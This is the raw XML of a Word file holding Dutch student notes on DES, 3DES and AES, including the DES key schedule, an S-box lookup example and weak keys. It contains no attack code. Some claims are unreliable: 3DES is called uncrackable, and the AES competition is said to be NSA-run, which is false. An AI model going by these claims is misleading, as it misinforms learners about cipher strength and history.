    <w:p w14:paraId="361A2BD5" w14:textId="130283DE" w:rsidR="004C1789" w:rsidRDefault="00EC34AB" w:rsidP="00EC34AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>DES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7A99D" w14:textId="2759121C" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="00EC34AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Data Encryption Standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C652AC" w14:textId="0C3EFBC4" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="00EC34AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tekst -&gt; Binair (blokken van 6</w:t>
      </w:r>
      <w:r w:rsidR="00C67A79">
        <w:t>4 bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9F6051" w14:textId="1EE3B666" w:rsidR="00C67A79" w:rsidRDefault="00C67A79" w:rsidP="00EC34AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Key = 56-bit (64bit, waarvan 8 controle-bits).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D0831C" w14:textId="6E429F0A" w:rsidR="00D81733" w:rsidRDefault="00D81733" w:rsidP="00EC34AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Decryptie is het omgekeerde proces van Encryptie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2C700" w14:textId="1F187E1C" w:rsidR="004C1789" w:rsidRDefault="004C1789" w:rsidP="00EC34AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verouderde standaard, vervangen door AES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53754296" w14:textId="77777777" w:rsidR="00EC34AB" w:rsidRDefault="00EC34AB" w:rsidP="00EC34AB"/>
    <w:p w14:paraId="26E164F5" w14:textId="5DED4B95" w:rsidR="00EC34AB" w:rsidRDefault="00EC34AB" w:rsidP="00EC34AB">
      <w:r>
        <w:t>Werking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEACDFE" w14:textId="77777777" w:rsidR="00EC34AB" w:rsidRDefault="00EC34AB" w:rsidP="00EC34AB"/>
    <w:p w14:paraId="737989D0" w14:textId="5E72E5C8" w:rsidR="00EC34AB" w:rsidRDefault="00EC34AB" w:rsidP="00EC34AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>64-bit invoer splitsen in 2 blokken van 32-bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51969C3A" w14:textId="4ABE3313" w:rsidR="00AD3BDD" w:rsidRDefault="003C264E" w:rsidP="003C264E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Er worden </w:t>
      </w:r>
      <w:r w:rsidR="00EC34AB">
        <w:t>permutatiematrix</w:t>
      </w:r>
      <w:r>
        <w:t>en</w:t>
      </w:r>
      <w:r w:rsidR="00EC34AB">
        <w:t xml:space="preserve"> gebruikt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PC-1, PC-2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38000390" w14:textId="77777777" w:rsidR="00AD3BDD" w:rsidRDefault="00AD3BDD" w:rsidP="00EC34AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encryptie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF61CF" w14:textId="0A41DB82" w:rsidR="00EC34AB" w:rsidRDefault="00B05284" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">16 iteraties -&gt; iedere iteratie </w:t>
      </w:r>
      <w:r w:rsidR="00EC34AB">
        <w:t>maakt een subkey aan van 48-bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E584C" w14:textId="6CEFE399" w:rsidR="00547764" w:rsidRDefault="00547764" w:rsidP="00547764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>KEY = 64-bit</w:t>
      </w:r>
      <w:r w:rsidR="00E510DF">
        <w:t xml:space="preserve"> = meestal een paswoord</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F41D30" w14:textId="3E81EE59" w:rsidR="00547764" w:rsidRDefault="00547764" w:rsidP="00547764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>64-bit -&gt; 56-bit via PC-1 Matrix</w:t>
      </w:r>
      <w:r w:rsidR="00582D06">
        <w:t xml:space="preserve"> (8 controle bits worden verwijderd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8280CD" w14:textId="4A3BE649" w:rsidR="00547764" w:rsidRDefault="00547764" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>56-bit -&gt; 2x28-bit</w:t>
      </w:r>
      <w:r w:rsidR="000B73BC">
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidR="00582D06">
        <w:t xml:space="preserve"> - &gt; </w:t>
      </w:r>
      <w:r>
        <w:t>Left-Shifts</w:t>
      </w:r>
      <w:r w:rsidR="00CE5323">
        <w:t xml:space="preserve"> (1 of 2 posities, hangt van de iteratie af)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13718105" w14:textId="1A67FA6B" w:rsidR="00547764" w:rsidRDefault="00547764" w:rsidP="00547764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>2x-28-bit</w:t>
      </w:r>
      <w:r w:rsidR="00582D06">
        <w:t xml:space="preserve"> output</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; 56 bit</w:t>
      </w:r>
      <w:r w:rsidR="003E207A">
        <w:t xml:space="preserve"> blok</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; PC-2 Matrix -&gt; 48-bit</w:t>
      </w:r>
      <w:r w:rsidR="00205591">
        <w:t xml:space="preserve"> blok</w:t>
      </w:r>
      <w:r w:rsidR="004175C5">
        <w:t xml:space="preserve"> = SubKey</w:t>
      </w:r>
      <w:r w:rsidR="00CE5323">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A4074" w14:textId="600ADFF2" w:rsidR="00EC34AB" w:rsidRDefault="00705351" w:rsidP="00EC34AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>2x</w:t>
      </w:r>
      <w:r w:rsidR="00EC34AB">
        <w:t>32-bit blok</w:t>
      </w:r>
      <w:r>
        <w:t>en worden</w:t>
      </w:r>
      <w:r w:rsidR="00EC34AB">
        <w:t xml:space="preserve"> vergroot naar 48-bit via een expansiematrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C6FC3D" w14:textId="746E4535" w:rsidR="00EC34AB" w:rsidRDefault="00A15ABE" w:rsidP="00EC34AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dan</w:t>
      </w:r>
      <w:r w:rsidR="00EC34AB">
        <w:t xml:space="preserve"> vindt er een XOR plaats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tussen </w:t>
      </w:r>
      <w:r w:rsidR="006B7354">
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r>
        <w:t>48-bit blok</w:t>
      </w:r>
      <w:r w:rsidR="006B7354">
        <w:t>ken</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidR="00EC34AB">
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidR="0032537C">
        <w:t>SubKey.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A79F853" w14:textId="5846AFAD" w:rsidR="00A15ABE" w:rsidRDefault="00073398" w:rsidP="00A15ABE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Deze 48-bi</w:t>
      </w:r>
      <w:r w:rsidR="00A15ABE">
        <w:t>t blok</w:t>
      </w:r>
      <w:r w:rsidR="00744229">
        <w:t>ken</w:t>
      </w:r>
      <w:r w:rsidR="00A15ABE">
        <w:t xml:space="preserve"> wordt verdeel</w:t>
      </w:r>
      <w:r w:rsidR="00CE5323">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00A15ABE">
        <w:t xml:space="preserve"> over 8 S-Boxen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F0B6B" w14:textId="24F1AACE" w:rsidR="00A15ABE" w:rsidRDefault="0056613E" w:rsidP="00A15ABE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>6-bit input -&gt; 4-bit output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205DCCDA" w14:textId="498888AF" w:rsidR="00205B81" w:rsidRDefault="00205B81" w:rsidP="00A15ABE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bv </w:t>
      </w:r>
      <w:r w:rsidRPr="00205B81">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00205B81">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1101</w:t>
      </w:r>
      <w:r w:rsidRPr="00205B81">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F071FA" w14:textId="6086C48E" w:rsidR="00205B81" w:rsidRDefault="00205B81" w:rsidP="00205B81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Eerste en laatste bit neem je, deze vormen de </w:t>
      </w:r>
      <w:r w:rsidR="0057482C">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>RIJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4451337A" w14:textId="10709449" w:rsidR="00205B81" w:rsidRPr="00205B81" w:rsidRDefault="00205B81" w:rsidP="00205B81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Middelste vier neem je, deze vormen de </w:t>
      </w:r>
      <w:r w:rsidR="0057482C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>KOLOM</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="715CDFAA" w14:textId="3CC788A2" w:rsidR="00205B81" w:rsidRDefault="003C4835" w:rsidP="00205B81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3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5F701" wp14:editId="356067A2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3883093</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>520700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="137728" cy="899534"/>
                <wp:effectExtent l="0" t="50800" r="66040" b="406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28" cy="899534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CE6D9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305.75pt;margin-top:41pt;width:10.85pt;height:70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nkwfgBAAA/BAAADgAAAGRycy9lMm9Eb2MueG1srFNNj9sgEL1X6n9A3Bs7H9vdRHH2kN30UrXR&#10;9uNOMCRIwKCBxsm/74ATt92tVLWqD8gw897MewzL+5Oz7KgwGvANH49qzpSX0Bq/b/iXz5s3d5zF&#10;JHwrLHjV8LOK/H71+tWyCws1gQPYViEjEh8XXWj4IaWwqKooD8qJOIKgPAU1oBOJtrivWhQdsTtb&#10;Ter6bdUBtgFBqhjp9KEP8lXh11rJ9FHrqBKzDafeUlmxrLu8VqulWOxRhIORlzbEP3ThhPFUdKB6&#10;EEmwb2heUDkjESLoNJLgKtDaSFU0kJpx/UzNp4MIqmghc2IYbIr/j1Z+OG6RmbbhM868cHRFj3YH&#10;HVuD9+QeIJtlk7oQF5S79lu87GLYYlZ80uiYtiZ8pfsvHpAqdioWnweL1SkxSYfj6e3thGZCUuhu&#10;Pr+ZFvaqp8l0AWN6p8Cx/NPwnfJpaGVa6MXxfUzUBIGuyRloPesaPp3NJzclLYI17cZYm4MR97u1&#10;RXYUNAebTU1fVkUUv6QlYeyjb1k6BzIioRF+b9Ul03oCZB965eUvna3qiz8pTTZmhX31PMBqKCmk&#10;JCHjgYmyM0xTewOw/jPwkp+hqgz334AHRKkMPg1gZzzg76qn07Vl3edfHeh1Zwt20J7LTBRraEqL&#10;q5cXlZ/Bz/sC//HuV98BAAD//wMAUEsDBBQABgAIAAAAIQCExy804QAAAAoBAAAPAAAAZHJzL2Rv&#10;d25yZXYueG1sTI/LTsMwEEX3SPyDNUjsqBMHQprGqSoQYlFYtEVi68ZDEvAjip02/D3DCpajObr3&#10;3Go9W8NOOIbeOwnpIgGGrvG6d62Et8PTTQEsROW0Mt6hhG8MsK4vLypVan92OzztY8soxIVSSehi&#10;HErOQ9OhVWHhB3T0+/CjVZHOseV6VGcKt4aLJMm5Vb2jhk4N+NBh87WfrIT+xezel5vnz1dhcDoU&#10;t9uieNxKeX01b1bAIs7xD4ZffVKHmpyOfnI6MCMhT9M7QiUUgjYRkGeZAHaUIER2D7yu+P8J9Q8A&#10;AAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250&#10;ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAs&#10;AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAH4nkwfgBAAA/BAAADgAAAAAAAAAAAAAAAAAs&#10;AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAhMcvNOEAAAAKAQAADwAAAAAAAAAAAAAA&#10;AABQBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAF4FAAAAAA==&#10;" strokecolor="red" strokeweight="2.75pt">
                <v:stroke endarrow="block"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006166FD" w:rsidRPr="00205B81">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C6F08E" wp14:editId="4DD17608">
            <wp:extent cx="2593476" cy="923874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 1" descr="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1.bmp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253" cy="9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C09A" w14:textId="6B47FDA1" w:rsidR="00205B81" w:rsidRDefault="00205B81" w:rsidP="00205B81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00205B81">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve">01 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= 1 en </w:t>
      </w:r>
      <w:r w:rsidRPr="00205B81">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">1101 </w:t>
      </w:r>
      <w:r>
        <w:t>= 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA0352" w14:textId="5BA7D029" w:rsidR="00205B81" w:rsidRDefault="00205B81" w:rsidP="00205B81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Rij 1 en Kolom 1</w:t>
      </w:r>
      <w:r w:rsidR="005F4DBE">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 5</w:t>
      </w:r>
      <w:r w:rsidR="00AD2610">
        <w:t xml:space="preserve"> in de tabel!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBE481E" w14:textId="635C6999" w:rsidR="00205B81" w:rsidRDefault="00205B81" w:rsidP="00205B81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>5 = 0101 = OUTPUT</w:t>
      </w:r>
      <w:r w:rsidR="00A221C3">
        <w:t xml:space="preserve"> = 4-bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9EE7A1" w14:textId="2E075925" w:rsidR="00A15ABE" w:rsidRDefault="00350C44" w:rsidP="00A15ABE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alle 4-bit outputs </w:t>
      </w:r>
      <w:r w:rsidR="004D0C34">
        <w:t>-&gt; 32-bit blok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D312478" w14:textId="703834C7" w:rsidR="00350C44" w:rsidRDefault="00EA616D" w:rsidP="00A15ABE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Deze blok</w:t>
      </w:r>
      <w:r w:rsidR="006304F4">
        <w:t xml:space="preserve"> wordt nog eens do</w:t>
      </w:r>
      <w:r w:rsidR="00350C44">
        <w:t>or de permutatiematrix gestuurd (transpositie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F44C91" w14:textId="42D51695" w:rsidR="00AD3BDD" w:rsidRDefault="00DB1E68" w:rsidP="00AD3BDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidR="00AD3BDD">
        <w:lastRenderedPageBreak/>
        <w:t>Decryptie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D03976" w14:textId="34479EEA" w:rsidR="00DB1E68" w:rsidRDefault="00DB1E68" w:rsidP="00DB1E68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Idem als encryptie, maar de volgorde van de 16 iteraties is omgedraaid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639037C" w14:textId="3AA83BF1" w:rsidR="00DB1E68" w:rsidRDefault="00DB1E68" w:rsidP="00DB1E68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De volgorde van de subkeys is dan K16 -&gt; K1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BA95A3" w14:textId="77777777" w:rsidR="006E11AB" w:rsidRDefault="006E11AB" w:rsidP="006E11AB"/>
    <w:p w14:paraId="3F2348D9" w14:textId="49B060B0" w:rsidR="006E11AB" w:rsidRDefault="006E11AB" w:rsidP="006E11AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DES heeft als groot voordeel dat het een </w:t>
      </w:r>
      <w:r w:rsidRPr="006E11AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Avalanche Effect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidRPr="006E11AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cascade Effect </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">veroorzaakt. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28556A39" w14:textId="07B9F9AA" w:rsidR="006E11AB" w:rsidRDefault="006E11AB" w:rsidP="006E11AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een kleine verandering</w:t>
      </w:r>
      <w:r w:rsidR="00431C19">
        <w:t xml:space="preserve"> wordt telkens groter en groter door de</w:t>
      </w:r>
      <w:r w:rsidR="00BE090E">
        <w:t xml:space="preserve"> 16</w:t>
      </w:r>
      <w:r w:rsidR="00431C19">
        <w:t xml:space="preserve"> iteraties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55166050" w14:textId="1085B2C3" w:rsidR="004A712B" w:rsidRDefault="004A712B" w:rsidP="006E11AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een nadeel ontstaat wel indien er zwakke keys worden gebruikt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BF0DEA" w14:textId="2D5CB77F" w:rsidR="004A712B" w:rsidRDefault="004A712B" w:rsidP="004A712B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>2x28 blokken -&gt; 1 kant allemaal 1, andere kant allemaal 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742793C4" w14:textId="58F84F30" w:rsidR="004A712B" w:rsidRDefault="004A712B" w:rsidP="004A712B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Left-Shifts leveren geen verandering op, alles blijft zoals het is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD89AA" w14:textId="36972064" w:rsidR="00DE7925" w:rsidRDefault="00DE7925" w:rsidP="004A712B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>2x vercijferen levert dus dezelfde tekst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC269CD" w14:textId="77777777" w:rsidR="00DE7925" w:rsidRDefault="00DE7925" w:rsidP="00DE7925"/>
    <w:p w14:paraId="40CAA8F6" w14:textId="39C0AF9F" w:rsidR="00DE7925" w:rsidRDefault="00DE7925" w:rsidP="00DE7925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3DES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E40D4" w14:textId="77777777" w:rsidR="00DE7925" w:rsidRDefault="00DE7925" w:rsidP="00DE7925"/>
    <w:p w14:paraId="13A9C53B" w14:textId="1ACB21CB" w:rsidR="00DE7925" w:rsidRDefault="00DE7925" w:rsidP="00DE7925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uitbreiding op gewone DES, want 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE7925">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">56 </w:t>
      </w:r>
      <w:r>
        <w:t>is hackable via een Brute-Force attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B62ACE" w14:textId="246B7567" w:rsidR="00DE7925" w:rsidRDefault="00DE7925" w:rsidP="00DE7925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>3DES = 3x DES uitvoeren met 3 verschillende sleutels</w:t>
      </w:r>
      <w:r w:rsidR="003B6785">
        <w:t xml:space="preserve"> = 1 sleutel van 168-bits = onkraakbaar!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475AA25A" w14:textId="77777777" w:rsidR="008E4CF6" w:rsidRDefault="008E4CF6" w:rsidP="008E4CF6"/>
    <w:p w14:paraId="6EA480E1" w14:textId="37F134DF" w:rsidR="008E4CF6" w:rsidRDefault="008E4CF6" w:rsidP="008E4CF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>AES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B860FAD" w14:textId="77777777" w:rsidR="008E4CF6" w:rsidRDefault="008E4CF6" w:rsidP="008E4CF6"/>
    <w:p w14:paraId="0C317DF7" w14:textId="61BA15A4" w:rsidR="008E4CF6" w:rsidRDefault="008E4CF6" w:rsidP="008E4CF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Advanced Encryption Standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21143053" w14:textId="50C0B6CC" w:rsidR="008E4CF6" w:rsidRDefault="008E4CF6" w:rsidP="008E4CF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zoals eerder vermeld is AES de opvolger van DES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DAB9BF" w14:textId="77777777" w:rsidR="007C7DE0" w:rsidRDefault="007C7DE0" w:rsidP="008E4CF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>AES = Rijndael</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC62BC0" w14:textId="77777777" w:rsidR="007C7DE0" w:rsidRDefault="007C7DE0" w:rsidP="007C7DE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wedstrijd door NSA georganiseerd</w:t>
